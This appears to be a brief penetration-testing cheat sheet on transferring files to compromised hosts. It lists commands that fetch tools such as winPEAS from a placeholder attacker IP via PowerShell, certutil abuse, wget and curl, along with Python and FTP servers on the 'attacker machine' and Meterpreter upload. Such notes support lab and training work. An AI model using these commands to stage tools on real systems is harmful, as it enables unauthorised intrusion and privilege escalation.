Powershell :
Invoke-WebRequest "http://<ip>:8000/winPEAS.exe" -OutFile winPEAS.exe
Certutil: certutil.exe -urlcache -f http://<ip>:<port>/<file.txt> file.txt HTTP: python -m SimpleHTTPServer 80
certutil.exe -urlcache -f http://<ip>:<port>/<file.txt> file.txt
python -m SimpleHTTPServer 80
python3 -m http.server Browser: Navigate directly to file FTP: python -m pyftpdlib 21 (attacker machine)
python3 -m http.server
python -m pyftpdlib 21
ftp 10.10.10.10 Linux: wget http://<ip>/<file>
ftp 10.10.10.10
wget http://<ip>/<file>
curl Meterpreter:
curl
upload <file> / download <file>
Last updated 4 years ago